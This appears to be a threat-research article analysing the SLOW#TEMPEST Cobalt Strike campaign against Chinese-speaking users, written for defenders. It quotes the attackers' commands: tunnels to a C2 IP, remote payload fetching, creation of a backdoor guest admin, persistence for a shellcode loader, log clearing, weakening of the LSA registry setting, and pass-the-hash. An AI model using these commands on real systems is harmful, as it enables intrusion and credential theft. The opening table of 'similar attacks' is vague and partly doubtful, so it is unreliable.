The realm of cybersecurity is ever-evolving, with threat actors continuously refining their methods to bypass defenses and exploit vulnerabilities. In recent times, the SLOW#TEMPEST campaign has emerged as a sophisticated and covert operation targeting Chinese-speaking users, particularly within China. This campaign is distinguished by its deployment of Cobalt Strike payloads, likely through phishing emails, and the subsequent ability of the attackers to move laterally, establish persistence, and remain undetected within compromised systems for extended periods. The Securonix Threat Research team has meticulously analyzed this campaign, uncovering the intricacies of the attack methods, the infrastructure involved, and the broader implications of such a targeted operation.
Overview of the SLOW#TEMPEST Campaign
The SLOW#TEMPEST campaign represents one of the more intricate and covert cyber-attacks observed in recent times, specifically targeting Chinese-speaking users, particularly within China. This campaign, which was meticulously analyzed by the Securonix Threat Research team, has unveiled a series of sophisticated methods used by attackers to infiltrate, control, and remain undetected within compromised systems.
The attackers initiated their operation through a classic yet effective technique: phishing emails. These emails contained ZIP files, some of which were password-protected, an additional layer meant to bypass basic security filters. The ZIP files harbored a malicious shortcut (.lnk) file, designed to look like a legitimate document, often using file names in Chinese to increase the chances of being opened by the target. Once the user opened this file, the attack was set in motion.
Upon opening the LNK file, the user unknowingly activated a process that involved a technique known as DLL hijacking. This is where the attackers took advantage of legitimate software processes to run their malicious code. Specifically, they exploited a Microsoft-signed executable, renamed as “UI.exe,” to load a malicious version of a standard DLL file. This allowed the attackers to execute the Cobalt Strike implant, a powerful tool commonly used in penetration testing but repurposed here for malicious activity. This implant enabled the attackers to establish a persistent and stealthy foothold within the system, communicating back to their command and control (C2) servers hosted in China.
The infrastructure used by the attackers is a significant aspect of this campaign. The C2 servers, crucial for managing the compromised systems, were hosted by Shenzhen Tencent Computer Systems Company Limited in China. This choice of hosting, combined with the Chinese-language focus of the phishing lures, suggests a campaign specifically targeting entities within China, possibly with state-backed resources.
Once the Cobalt Strike implant was in place, the attackers had the ability to move laterally across the network. This involved identifying other systems that could be compromised, often using tools like Mimikatz to extract credentials from the memory of infected systems. With these credentials, the attackers could escalate privileges, gaining deeper access and control over the network.
Persistence was another key element of the attackers’ strategy. They employed multiple methods to ensure their presence within the compromised environment remained undetected for extended periods. This included creating scheduled tasks that would repeatedly execute their malicious code, even after system reboots. Additionally, they manipulated legitimate processes and system settings, such as modifying registry keys, to embed themselves deeply into the system’s operational fabric.
A noteworthy aspect of the SLOW#TEMPEST campaign is the use of Cobalt Strike, a tool originally developed for legitimate security purposes but increasingly co-opted by cybercriminals and state-sponsored attackers. Cobalt Strike’s flexibility and power make it a favored tool for maintaining control over compromised systems. In this campaign, the attackers used it not only to establish communication with their C2 servers but also to carry out a range of post-exploitation activities, such as data exfiltration, further lateral movement within the network, and deploying additional malicious payloads.
The attackers demonstrated a high level of operational security throughout the campaign, making it difficult for defenders to detect and respond. However, their methods also highlighted some significant trends in modern cyber warfare. The attackers’ focus on Chinese infrastructure and users, their use of language-specific lures, and their sophisticated persistence mechanisms all point to a highly targeted operation, possibly aimed at specific sectors or organizations within China.
The SLOW#TEMPEST campaign underscores the challenges faced by organizations in defending against advanced persistent threats (APTs). These types of attacks are characterized by their ability to remain hidden within networks for long periods, often months or even years, without being detected. The attackers behind SLOW#TEMPEST have demonstrated a deep understanding of the systems they are targeting, using tools and techniques that allow them to blend in with normal network traffic and avoid triggering traditional security alarms.
This campaign also highlights the dual-edged nature of security tools like Cobalt Strike. While these tools are invaluable for legitimate security testing and research, their misuse by malicious actors poses a significant threat. As more attackers gain access to these powerful tools, the line between legitimate and malicious use becomes increasingly blurred, making the job of defenders even more challenging.
The SLOW#TEMPEST campaign is a clear example of the evolving threat landscape in cybersecurity. It emphasizes the need for organizations to continuously adapt their defenses, employ advanced detection capabilities, and maintain constant vigilance to protect against such sophisticated and persistent attacks. The insights gained from this campaign provide a valuable roadmap for improving security strategies and preparing for future threats in an increasingly complex digital world.
Global cyber-attacks that utilized similar techniques to those seen in the SLOW#TEMPEST campaign, such as DLL hijacking, phishing, lateral movement, and the use of tools like Cobalt Strike.
Date | Nation | Targeted Organization | Attacking Group | Techniques Used | Damages | Ransom |
---|---|---|---|---|---|---|
2023 | United States, Russia, China | Various healthcare organizations | Conti, LockBit | Cobalt Strike, DLL hijacking, Phishing | Disrupted patient care, delayed medical procedures | Not always demanded; in some cases, millions in cryptocurrency |
2023 | Germany | Bundestag (German Parliament) | Sofacy Group (APT28) | Phishing, DLL hijacking | Compromised email infrastructure, exfiltration of sensitive data | N/A |
2023 | India | Government Email Systems | Unknown (suspected state-sponsored) | Phishing, DLL hijacking, Credential Harvesting | Multiple breaches of high-level government emails | N/A |
2023 | Multiple (Global) | Financial Institutions, Energy Sector | Nation-state groups (Russia, China) | Cobalt Strike, Lateral Movement, Data Exfiltration | Significant data theft, infrastructure disruptions | Typically not ransom-focused, more on espionage |
2024 | Israel, Saudi Arabia, Ukraine, Iran, Thailand | Government and Industrial Organizations | Unknown (China-based) | Phishing, Lateral Movement, Cobalt Strike | Long-term network infiltration, data theft | N/A |
2024 | United States | Various Corporations | DEV-0243 (suspected Russian) | DLL hijacking, Cobalt Strike | Data breaches, operational disruptions | No direct ransom, focused on data exfiltration |
2024 | Global | Multiple | State-backed and Criminal Groups | Phishing, Cobalt Strike, Lateral Movement | Global impact on critical infrastructure, economic losses | Ransomware demands vary widely, up to tens of millions USD |
Key Observations:
- Techniques: DLL hijacking and Cobalt Strike are prominent in many of these attacks, often used together to gain initial access and maintain persistence.
- Targets: Healthcare and government organizations are frequent targets, given the critical nature of their operations and the value of their data.
- Attackers: Both nation-state actors and organized cybercriminal groups leverage these techniques, with notable groups like Conti, LockBit, and APT28 being involved.
- Damages: The damages range from operational disruptions to significant financial losses, especially in sectors like healthcare where lives can be impacted.
- Ransom: While not every attack involved a ransom demand, in cases where ransomware was deployed, the demanded amounts have ranged into the millions.
IN-DEPTH ANALYSIS …
The Unfolding of SLOW#TEMPEST: Initial Discovery and Attack Vector
The SLOW#TEMPEST campaign was first identified by the Securonix Threat Research team, which observed the distribution of malicious ZIP files designed to deploy Cobalt Strike implants on targeted systems. The campaign’s focus on Chinese-speaking users is evident through the use of file names and lures predominantly written in Chinese. Additionally, the command and control (C2) infrastructure employed by the threat actors was hosted in China, specifically by Shenzhen Tencent Computer Systems Company Limited, further indicating the campaign’s primary focus on Chinese targets.
Despite the extensive analysis, the exact origin of the attack remains elusive. The attack vector, while not conclusively determined, aligns with traditional phishing tactics, where ZIP files—sometimes password-protected—are distributed via unsolicited emails. These ZIP files contain shortcut (.lnk) files that masquerade as legitimate documents, a tactic that has been observed in other campaigns involving malware like Qakbot.
Figure 1: Analysis of 违规远程控制软件人员名单.docx.lnk
Inside the Infection Chain: From ZIP Files to Code Execution
The infection process begins when the target opens the malicious ZIP file. In some cases, these files are password-protected, with the password typically provided within the phishing email. This method of encryption serves to evade detection by email-based antivirus software, which may be unable to examine the contents of the ZIP file without the password.
Upon extracting the ZIP file, the user is presented with a single LNK file that is disguised as a Word document. For example, one analyzed sample included a file named “违规远程控制软件人员名单.docx.lnk,” which translates to “List of people who violated the remote control software regulations.” The choice of language and the nature of the document suggest that the campaign may be targeting specific sectors within China, such as government or business entities that enforce remote control software regulations.
When the user executes the LNK file, the malicious code execution begins. The LNK file runs an executable contained within an unusually structured directory, which includes references to macOS metadata files. The directory name, “其他信息,” translates to “Additional Information,” adding another layer of obfuscation.
Figure 2: Output of the “tree” command upon the extracted zip file contents
Analyzing the Malicious Payload: DLL Hijacking and Cobalt Strike Implant
The LNK file, upon execution, initiates a process that involves DLL hijacking—a technique that allows attackers to execute malicious code by exploiting legitimate executables. In this case, the LNK file triggers the execution of a legitimate Microsoft-signed executable named “UI.exe,” which has been renamed from “LicensingUI.exe.” This executable is responsible for displaying the user interface related to software licensing and activation in Windows.
LicensingUI.exe is designed to load several legitimate DLL files, including “dui70.dll,” which typically resides in the C:\Windows\System32 directory. However, due to a DLL path traversal vulnerability, any DLL with the same name can be loaded from the directory where the executable resides. The attackers exploited this vulnerability by placing a malicious version of “dui70.dll” in the directory, which was then loaded by UI.exe.
The malicious DLL is a Cobalt Strike implant, providing the attackers with persistent and stealthy access to the compromised system. The implant is configured to communicate with a C2 server at hxxp://123.207.74[.]22/mall_100_100.html over port 11443. The network traffic associated with this communication is obfuscated using Malleable C2 profiles, which are designed to evade detection by network-based security measures.
Once the Cobalt Strike implant is executed, it injects itself into the Windows process “runonce.exe,” a legitimate process that typically handles tasks that need to be completed once after a system restart. By injecting into this process, the attackers are able to blend their malicious activity with legitimate system processes, making detection more challenging.
Figure 3: Cobalt Strike (DLL) and UI.exe (legitimate) file execution.
The Attackers’ Playbook: Lateral Movement, Privilege Escalation, and Persistence
After establishing a foothold on the initial compromised system, the attackers begin to move laterally across the network. This involves identifying other systems within the network that can be compromised, often through the exploitation of weak or reused credentials, unpatched vulnerabilities, or misconfigured systems.
One of the key tools used in this phase of the attack is Mimikatz, a well-known post-exploitation tool that allows attackers to extract credentials from memory, enabling them to escalate privileges and gain access to other systems within the network. Mimikatz is particularly effective in environments where security measures like Credential Guard are not enabled, as it can extract plaintext passwords, Kerberos tickets, and other sensitive information directly from memory.
With elevated privileges, the attackers can establish persistence on multiple systems within the network. This is often achieved through the creation of scheduled tasks, the modification of registry keys, or the deployment of additional malware that ensures the attackers maintain access even if the initial infection vector is removed.
The persistence mechanisms observed in the SLOW#TEMPEST campaign are sophisticated and varied. In addition to the use of Cobalt Strike beacons, the attackers have employed custom scripts and tools designed to evade detection by traditional antivirus software. These tools are often executed through legitimate system processes, further complicating detection efforts.
Figure 4: Cobalt Strike process chain
The Role of Cobalt Strike: A Double-Edged Sword in Cybersecurity
Cobalt Strike, originally developed as a legitimate penetration testing tool, has become a double-edged sword in cybersecurity. While it is widely used by security professionals to test the resilience of systems and networks, it has also been adopted by cybercriminals and nation-state actors as a powerful tool for conducting sophisticated attacks.
In the case of the SLOW#TEMPEST campaign, Cobalt Strike is used to establish a robust and flexible command and control infrastructure. The use of Malleable C2 profiles allows the attackers to customize the network traffic generated by the Cobalt Strike implant, making it appear as legitimate traffic to avoid detection by intrusion detection systems (IDS) and other security mechanisms.
The versatility of Cobalt Strike is one of the reasons it has become so popular among threat actors. It can be used to conduct a wide range of post-exploitation activities, including lateral movement, privilege escalation, data exfiltration, and the deployment of additional payloads. In the hands of skilled attackers, Cobalt Strike can be a formidable tool for maintaining long-term access to compromised networks.
However, the widespread use of Cobalt Strike by malicious actors has also led to increased scrutiny from security vendors and researchers. Many organizations now deploy specialized detection and response capabilities designed specifically to identify and mitigate the use of Cobalt Strike within their networks. Despite these efforts, the tool’s adaptability and the skill of its users mean that it remains a significant threat.
Infrastructure and Command and Control: A Closer Look at the C2 Servers
The SLOW#TEMPEST campaign’s command and control infrastructure is hosted within China, with the majority of the C2 servers operated by Shenzhen Tencent Computer Systems Company Limited. This choice of hosting provider is significant, as it suggests that the attackers may have ties to China or are specifically targeting Chinese entities.
The C2 servers play a critical role in the attackers’ operations, providing a central point of control for the malware deployed on compromised systems. Through these servers, the attackers can issue commands to the Cobalt Strike implants, receive exfiltrated data, and update the malware with new capabilities or configurations.
The use of Chinese hosting providers also complicates efforts to take down the C2 infrastructure. While international cooperation between law enforcement agencies and cybersecurity firms has led to the takedown of C2 servers in other regions, operations hosted within China may be less susceptible to such efforts, particularly if the attackers have local support or protection.
The Implications of SLOW#TEMPEST: A Broader Perspective on Targeted Attacks
The SLOW#TEMPEST campaign highlights several broader trends in the world of cybersecurity. First and foremost, it underscores the increasing sophistication of targeted attacks, particularly those aimed at specific regions or sectors. The use of language-specific lures, locally hosted C2 infrastructure, and advanced persistence mechanisms all point to a highly tailored operation designed to evade detection and maximize impact.
Secondly, the campaign illustrates the growing challenge of defending against advanced persistent threats (APTs). APTs are characterized by their ability to maintain a presence within compromised networks for extended periods, often months or even years. The attackers behind SLOW#TEMPEST demonstrated a high level of operational security, making it difficult for defenders to detect and respond to the threat.
The use of widely available tools like Cobalt Strike and Mimikatz also raises important questions about the accessibility of powerful offensive tools. While these tools have legitimate uses in penetration testing and security research, their availability to malicious actors poses a significant risk. Organizations must be vigilant in their detection and response efforts, as the same tools used to strengthen security can also be turned against them.
Finally, the SLOW#TEMPEST campaign serves as a reminder of the importance of international cooperation in combating cyber threats. The cross-border nature of cyber attacks means that no single country or organization can address these threats alone. Effective collaboration between governments, law enforcement, and the private sector is essential to identifying and neutralizing the infrastructure used by cybercriminals and state-sponsored actors.
Unveiling Post-Exploitation Tactics and Persistent Threats
The SLOW#TEMPEST campaign represents a complex and calculated approach to cyber espionage, where attackers meticulously plan and execute each phase of the attack, from initial compromise to post-exploitation. With the attackers gaining complete control over the target host, they initiated a series of sophisticated post-exploitation activities designed to deepen their foothold, exfiltrate valuable data, and ensure long-term persistence within the compromised environment.
Staging and Tool Deployment: Preparing for the Attack
Once the attackers established control over the compromised system, they began by setting up a staging directory within the system’s temporary files directory: C:\Windows\Temp\tmp
. This directory served as the primary location for downloading and executing various tools essential for further exploitation and data collection.
Several binary files were downloaded into this directory, each serving a specific purpose in the attackers’ broader strategy:
- fpr.exe: An unknown executable, potentially custom-built for this operation.
- iox.exe: A utility for port forwarding and setting up proxied connections, enabling the attackers to maintain external communication with their command and control (C2) servers.
- fscan.exe: A well-known scanner in red teaming, used for identifying live hosts and open ports within the compromised network. Its results were saved in a file named
result.txt
. - netspy.exe: A network reconnaissance tool designed to capture network traffic or identify vulnerabilities within the network. It produced log files such as
netspy.log
andalive.txt
. - lld.exe: A shellcode loader binary used to execute raw shellcode contained within a file named
tmp.log
. This tool is a critical component in executing arbitrary code in memory, bypassing traditional security measures. - sharpdecryptpwd.exe: A utility for collecting and dumping cached credentials from various installed applications, including Navicat, TeamViewer, FileZilla, WinSCP, and Xmanager. This tool was likely used to gather credentials for further exploitation.
- pvefindaduser.exe: A tool used for Windows Active Directory (AD) user enumeration, assisting the attackers in mapping out the user environment for privilege escalation and lateral movement.
- gogo_windows_amd64.exe: Related to an open-source project named “Nemo,” which automates the use of enumeration tools such as Nmap and Masscan. This tool outputs files like
.sock.lock
andoutput.txt
, likely containing results of network scans.
Each of these tools was executed in sequence by the attackers, with iox.exe
playing a pivotal role in establishing tunnels to external infrastructure (specifically to IP 49.235.152[.]72:8282
). This allowed the attackers to exfiltrate collected data and maintain a backchannel for ongoing operations, effectively bypassing traditional network defenses.
Privilege Escalation and Persistence: Cementing Control
A crucial aspect of the attackers’ strategy was to ensure they maintained persistent access to the compromised environment. To achieve this, they created a scheduled task named windowsinspectionupdate
, designed to execute the malicious executable lld.exe
at regular intervals. The scheduled task was set to run the following command:
shell -cmd /c start c:/windows/temp/tmp/lld.exe c:/windows/temp/tmp/tmp.log
The lld.exe
executable is central to the attackers’ toolkit, used to load and execute shellcode directly in memory. This method of execution is particularly insidious, as it allows the attackers to bypass traditional file-based antivirus detection and maintain a stealthy presence on the system. By scheduling this task, the attackers ensured that their malicious code would be executed repeatedly, allowing them to re-establish control over the system even after reboots or network disruptions.
In addition to the scheduled task, the attackers manipulated the built-in Guest user account, which is typically disabled and minimally privileged in most Windows environments. By manually elevating this account’s privileges and assigning it a new password, they transformed it into a powerful access point:
shell -cmd.exe /c net user guest 1qaz@wsx
cmd.exe /c net localgroup administrators guest /add
cmd.exe /c net localgroup "remote desktop users" guest /add
cmd.exe /c net user guest /active:yes
This manipulation significantly increased the security risks to the compromised system. By converting a low-privilege, often overlooked account into one with administrative and remote access capabilities, the attackers created a backdoor that could easily go unnoticed. This backdoor provided them with an alternative means of accessing the system, ensuring their presence even if other persistence mechanisms were detected and removed.
Persistent Presence Through Windows Services: A Stealthy Approach
To further solidify their control, the attackers installed a malicious Windows service named windowsinspectionupdate
. This service was configured to execute the lld.exe
executable with the tmp.log
file as input every time the system started:
shell -cmd.exe /c sc create "windowsinspectionupdate" binpath= "cmd /c start c:/windows/temp/tmp/lld.exe c:/windows/temp/tmp/tmp.log"
cmd.exe /c sc description windowsinspectionupdate "windows inspection integrity"
cmd.exe /c sc config windowsinspectionupdate start= auto
This service-based persistence mechanism is particularly effective, as it ensures that the attackers’ shellcode is executed upon system startup, allowing them to maintain ongoing access even after system reboots. By disguising the service as a legitimate system update service, the attackers further reduced the likelihood of detection.
Lateral Movement and Network Enumeration: Expanding the Attack
With a firm foothold established, the attackers turned their attention to lateral movement and network enumeration. Using tools like iox.exe
and fscan.exe
, they conducted scans of the internal network, identifying additional targets for compromise. The attackers focused on high-value assets such as MSSQL servers and specific subnets that could provide further access to sensitive data or systems.
The use of iox.exe
for network port forwarding and tunneling was particularly noteworthy, as it allowed the attackers to maintain a persistent connection to their external C2 infrastructure while probing the internal network. This technique enabled them to exfiltrate data and issue commands remotely, effectively bypassing traditional perimeter defenses.
The Bigger Picture: Implications of the SLOW#TEMPEST Campaign
The post-exploitation tactics observed in the SLOW#TEMPEST campaign underscore the sophistication and persistence of modern cyber threats. The attackers’ use of advanced tools and techniques highlights the challenges faced by defenders in identifying and mitigating such threats. The ability to maintain long-term access to compromised systems through multiple persistence mechanisms, combined with the stealthy execution of malicious code, makes campaigns like SLOW#TEMPEST particularly difficult to combat.
Moreover, the campaign’s focus on Chinese-speaking users and infrastructure hosted within China raises important questions about the motivations behind the attack. Whether driven by cybercriminals seeking financial gain or state-sponsored actors engaged in espionage, the SLOW#TEMPEST campaign exemplifies the growing complexity of targeted cyber operations.
Advanced Techniques in the SLOW#TEMPEST Campaign: Lateral Movement, Credential Harvesting, and Active Directory Exploitation
As the SLOW#TEMPEST campaign progressed, the attackers demonstrated a high level of sophistication in their lateral movement strategies and credential harvesting techniques. These methods allowed them to pivot within the compromised network, escalate privileges, and maintain a persistent and stealthy presence. Their tactics further underscore the complexity and advanced nature of modern cyber threats.
Lateral Movement via RDP and Credential Harvesting
The attackers utilized Remote Desktop Protocol (RDP) as their primary means of moving laterally across the network. Initial attempts to log in to other systems using the compromised user account were unsuccessful. However, persistence paid off when a successful RDP connection was established to another domain-joined server. Once inside this new environment, the attackers deployed several reconnaissance and scanning tools, such as fscan.exe
and netspy.exe
, to map out the network and identify potential targets.
These tools produced output files, including results that indicated five hosts with open ports, which the attackers then began to enumerate. This step is crucial in the attack chain, as it helps the attackers identify vulnerable systems that can be exploited to gain further access or to extract valuable data.
Credential harvesting was another critical component of the attackers’ strategy. They employed sharpdecryptpwd.exe
to extract stored credentials from web browsers, specifically targeting the Chrome browser in this attack chain. The harvested credentials were then used to authenticate and pivot into other systems within the network, effectively expanding the attackers’ reach and control.
shell -cmd.exe /c sharpdecryptpwd.exe chrome
Use of Mimikatz and Pass-the-Hash Techniques
One of the most notable tools deployed by the attackers was Mimikatz, a widely recognized utility for Windows credential dumping. Mimikatz was executed from the Cobalt Strike process lld.exe
, allowing the attackers to extract credentials directly from the system’s memory. These credentials included passwords, hashes, and other sensitive information that could be used to further compromise the network.
In one observed instance, the attackers attempted to use the pass-the-hash technique. This method involves using a captured hash to authenticate as a user without needing to know the actual plaintext password. The attackers targeted the mstc.exe
process, which is the executable for Microsoft’s Remote Desktop Connection tool. By using the /restrictedadmin
flag, they ensured that the user’s credentials would not be transmitted over the network, thereby reducing the likelihood of detection by network-based security tools.
shell - sekurlsa::pth /user:[REDACTED] /domain:[REDACTED] /ntlm:[REDACTED] "/run:mstsc.exe /restrictedadmin"
In addition to pass-the-hash, the attackers used the Cobalt Strike implant to authenticate as an administrator by passing the hash against a list of IP addresses compiled in an ip.txt
file. The following command was used to execute this technique:
shell -crackmapexec smb ip.txt -u [REDACTED_DOMAIN]/Administrator -H [REDACTED_HASH]
Shortly after, they employed psexec.py
to target specific IP addresses, further exploiting the harvested credentials:
shell -python3 psexec.py [REDACTED_USER]@[REDACTED_IP] -hashes [REDACTED_HASH] -codec gbk
Disabling “Restricted Admin Mode” in LSA
As part of their lateral movement strategy, the attackers took steps to disable “Restricted Admin Mode” in the Local Security Authority (LSA). This security feature, introduced in newer versions of Windows, limits the exposure of credentials when connecting to a remote system via RDP. By disabling this feature, the attackers ensured that they could maintain broader access to the network without triggering additional security alerts.
To disable “Restricted Admin Mode,” the attackers executed the following registry commands:
shell -cmd.exe /c reg add "HKLM\System\CurrentControlSet\control\lsa" /v disablerestrictedadmin /t reg_dword /d 00000000 /f
They then verified the change with:
shell -cmd.exe /c reg query "hklm\system\currentcontrolset\control\lsa" | findstr "disablerestrictedadmin"
By executing these commands, the attackers effectively lowered the security posture of the compromised systems, making it easier to move laterally and maintain their foothold within the network.
Re-Establishing Remote Connections and Further Lateral Movement
After successfully pivoting into other systems, the attackers used iox.exe
to establish another remote connection back to their command and control (C2) server. This step was crucial for maintaining a persistent backchannel, allowing the attackers to continue exfiltrating data and issuing commands remotely:
shell -cmd.exe /c start /b iox.exe proxy -r *49.235.152[.]72:8282 -k 616161
The use of iox.exe
for establishing proxied connections is a clear indication of the attackers’ intent to maintain long-term access and to evade detection by traditional network security measures.
BloodHound for Domain Enumeration and Exploitation
As the attackers advanced their operations within the compromised network, they deployed BloodHound, a powerful tool designed for Active Directory (AD) reconnaissance. BloodHound is capable of mapping out complex relationships within an AD environment, providing detailed insights into potential pathways for privilege escalation and further lateral movement.
BloodHound was executed via the runonce.exe
process, which had been targeted earlier in the campaign by Cobalt Strike. Once deployed, BloodHound collected extensive data on the AD environment, including information about users, computers, groups, organizational units, and group policy objects. This data was compiled into several .json
files, which provided a comprehensive map of the AD structure.
The collected data was then compressed into a BloodHound.zip
archive. This archive, once exfiltrated to the attackers’ infrastructure, allowed them to analyze the AD environment in detail on their own systems. This analysis likely enabled the attackers to identify and exploit further weaknesses within the network, facilitating additional privilege escalations and lateral movements.
Implications of Advanced Post-Exploitation Tactics
The post-exploitation activities observed in the SLOW#TEMPEST campaign highlight the attackers’ advanced technical capabilities and deep understanding of Windows environments. Their use of tools like Mimikatz, BloodHound, and Cobalt Strike, combined with sophisticated techniques such as pass-the-hash and disabling security features, underscores the complexity and danger of modern cyber threats.
These tactics also reveal the attackers’ focus on persistence and stealth. By carefully managing their lateral movements, credential harvesting, and Active Directory exploitation, the attackers ensured that they could maintain long-term access to the network while minimizing the risk of detection.
The deployment of BloodHound, in particular, is indicative of a well-resourced and highly skilled adversary. This tool is not only powerful in its ability to enumerate and map out an AD environment, but it also provides attackers with the information needed to execute precision strikes against high-value targets within the network.
SLOW#TEMPEST Campaign: Advanced Enumeration Techniques and Infrastructure Analysis
As the SLOW#TEMPEST campaign unfolded, the attackers demonstrated a methodical approach to enumeration, leveraging both built-in Windows utilities and specialized tools to gather intelligence on the compromised network. This intelligence-gathering phase was critical for understanding the environment, identifying valuable targets, and planning further exploitation. Additionally, the attackers’ operational security (OPSEC) lapses provided valuable insights into their infrastructure and methods, further enriching the overall understanding of the campaign.
System and Network Enumeration: Probing the Environment
The attackers employed a variety of built-in Windows commands to perform initial reconnaissance on the compromised systems. These commands were aimed at gathering detailed information about the system’s configuration, network status, and user accounts, which would inform their subsequent actions. Some of the key commands used include:
- ipconfig: Used to display the network configuration of the system, including IP addresses, subnet masks, and default gateways.shell
cmd.exe /c ipconfig
- wevtutil cl “windows powershell”: This command was used to clear the Windows PowerShell event logs, likely to cover the attackers’ tracks and reduce the chances of detection.shell
cmd.exe /c wevtutil cl "windows powershell"
- ping: Employed to test connectivity with other systems and determine the presence of domain controllers.shell
cmd.exe /c ping [REDACTED]
- tasklist /svc: Used to display a list of currently running processes and associated services, helping the attackers identify critical processes and services that might be exploited.shell
cmd.exe /c tasklist /svc
- systeminfo: Provides detailed information about the system, including OS version, hardware details, and patch levels, which can be critical for identifying vulnerabilities.shell
cmd.exe /c systeminfo
- net commands: Various
net
commands were used to enumerate users, groups, and network shares, further mapping out the network and identifying potential avenues for privilege escalation.shellcmd.exe /c net user /domain
- netstat -ano: This command lists all active network connections and listening ports, along with the process IDs that own those connections, helping the attackers identify active services and potential points of entry.shell
cmd.exe /c netstat -ano
- whoami: Used to confirm the current user’s privileges and identity within the system, which is crucial for planning further attacks.shell
cmd.exe /c whoami
Additionally, the attackers used curl
to probe a Chinese-based public IP information website (hxxp://myip[.]ipip.net), to retrieve the system’s public IP address, which could be used for further external communication or to plan subsequent attacks.
shell cmd.exe /c curl hxxp://myip.ipip[.]net
Advanced Enumeration Tools: Expanding the Attack Surface
Beyond basic system commands, the attackers deployed specialized tools to perform more comprehensive scans and enumeration activities. These tools allowed them to identify active hosts, open ports, and vulnerabilities within the network:
- fscan.exe: A tool commonly used in red teaming for scanning networks. It was employed to enumerate the local subnet and identify live hosts and services.shell
cmd.exe /c fscan.exe -h [REDACTED]/24
- pvefindaduser.exe: Used to enumerate Active Directory users, focusing on current users and avoiding detection by not pinging systems.shell
pvefindaduser.exe -current -noping -os
- gogo_windows_amd64.exe: Related to the Nemo project, this tool automates the use of enumeration utilities like Nmap and Masscan, providing extensive data on network services and potential vulnerabilities.shell
gogo_windows_amd64.exe -i [REDACTED]/24 -p 445 -f output.txt
These tools enabled the attackers to map out the network comprehensively, identifying not only the systems that were active but also the services that could be exploited for further penetration.
OPSEC Failures and Infrastructure Insights
During the course of the attack, the SLOW#TEMPEST operators made several OPSEC (Operational Security) errors that provided significant insights into their infrastructure and methods. One such error involved the capture of Cobalt Strike commands, which revealed details about the attackers’ operational environment and infrastructure.
For instance, the following command was intercepted:
shell execute-assembly /Users/apple/Desktop/C++/sb.exe -e hxxps://360-1305242994.cos.ap-nanjing.myqcloud[.]com/wel/ns/sa64.gif -s c:\\windows\\system32\\runonce.exe -a "browser -b all -z" –disable-bypass-cmdline –disable-bypass-amsi –disable-bypass-etw
This command provided several key details:
- Execution Environment: The command was run from a macOS environment (
/Users/apple/Desktop/C++/sb.exe
), indicating that the attackers were operating from a diverse set of systems, including non-Windows platforms. This aligns with other observed activities where macOS-based tools like Geacon, a Cobalt Strike variant for macOS, have been used. - Use of SharpBlock: The executable
sb.exe
appears to be a compiled version of SharpBlock, an open-source tool that allows attackers to bypass Endpoint Detection and Response (EDR) and Microsoft’s Anti-Malware Scan Interface (AMSI). This tool was used to implant specific processes controlled by the attackers, further evading detection. - Payload Hosting: The payload was hosted on a Tencent Cloud Object Storage (COS) resource (
360-1305242994.cos.ap-nanjing.myqcloud[.]com
), which is managed by Shenzhen Tencent Computer Systems Company Limited, a major Chinese tech company. This detail underscores the likelihood that the attackers were leveraging Chinese infrastructure extensively for their operations.
Another significant OPSEC failure involved the capture of file execution from a local path that revealed another username:
shell /Users/guoyansong/D/gongju/????/??????/????/SharpWeb.exe
This provided the name “guoyansong,” possibly linking the attack to an individual or a persona used by the attackers. The directory structure and file names further suggested that the attackers were using a mix of customized tools and scripts to conduct their operations.
Implications and Broader Analysis
The enumeration activities and OPSEC failures observed during the SLOW#TEMPEST campaign provide a window into the attackers’ capabilities and operational methodologies. The use of both standard system commands and specialized tools demonstrates a well-rounded approach to reconnaissance, where the attackers meticulously gathered information before launching further exploits.
The insights gained from intercepted commands and infrastructure details also highlight the importance of understanding the attackers’ environment and tools. The use of Chinese-based infrastructure, combined with the observed OPSEC lapses, suggests that the attackers may have ties to China, either as part of a state-sponsored operation or through collaboration with local cybercriminal groups.
These findings underscore the need for organizations to maintain a vigilant posture against advanced threats like SLOW#TEMPEST. By closely monitoring for unusual activity, particularly during the reconnaissance and enumeration phases, defenders can potentially detect and disrupt attacks before they escalate.
The Implications and Lessons from the SLOW#TEMPEST Campaign
The SLOW#TEMPEST campaign, uncovered by the Securonix Threat Research team, serves as a stark reminder of the evolving threat landscape faced by organizations worldwide. This highly organized and sophisticated attack specifically targeted Chinese-speaking users, demonstrating a methodical and advanced approach to cyber espionage. While no direct attribution to known Advanced Persistent Threat (APT) groups was possible, the complexity and precision of the attack suggest that it was orchestrated by a highly experienced threat actor with deep knowledge of advanced exploitation frameworks like Cobalt Strike and an array of post-exploitation tools.
The Sophistication of the Attack
The SLOW#TEMPEST campaign is characterized by its intricate attack chain, which includes a variety of sophisticated techniques aimed at maintaining long-term control over compromised systems. The attackers employed undocumented DLL injection methods, exploiting Microsoft-signed executables like LicensingUI.exe to bypass security measures. Additionally, the use of BloodHound for Active Directory reconnaissance further exemplifies the attackers’ advanced capabilities, allowing them to map out the network and identify key targets for privilege escalation and lateral movement.
One of the most concerning aspects of the campaign is the attackers’ focus on persistence. By creating scheduled tasks and elevating user privileges, they ensured that their foothold within the network could be maintained over an extended period, in this case, over two weeks. This level of persistence is indicative of a threat actor who is not only skilled but also highly motivated to achieve their objectives, whether those are espionage, data theft, or disruption.
Key Indicators of Compromise and Defensive Measures
The SLOW#TEMPEST campaign provides critical indicators of compromise (IOCs) that security teams can use to bolster their defenses. These IOCs include specific file paths, process names, and network traffic patterns associated with the attack. By monitoring for these indicators, organizations can detect similar threats before they cause significant harm.
Phishing as the Likely Initial Vector:
The campaign likely began with phishing emails, a common initial attack vector in many cyber-espionage operations. These emails may have contained malicious attachments, such as ZIP files, which sometimes were password-protected to evade detection by email security solutions. The threat actors used these files to deliver the initial payload, which then set the stage for the rest of the attack. To counter this, organizations should implement robust email security measures and educate users about the risks of opening unsolicited attachments.
Monitoring and Logging:
Given the sophisticated nature of the SLOW#TEMPEST campaign, Securonix recommends enhancing endpoint logging capabilities. This includes deploying tools like Sysmon for detailed process-level logging and enabling comprehensive PowerShell logging. These measures are crucial for detecting the kind of script-based attacks and encrypted command-and-control communications used in this campaign.
Secure Configurations:
Another recommendation is to monitor common malware staging directories. In this campaign, the attackers utilized subdirectories within C:\ProgramData
, C:\Windows\Temp
, and the user’s %APPDATA%
directory to stage their tools and payloads. By securing these directories and monitoring them for unusual activity, organizations can reduce the risk of malware establishing a foothold on their systems.
Securonix’s Proactive Detection Strategies
For organizations utilizing the Securonix platform, specific hunting queries have been developed to detect the activity associated with the SLOW#TEMPEST campaign. These queries focus on identifying the IOCs and tactics observed in the attack, providing a proactive means of detecting and responding to similar threats.
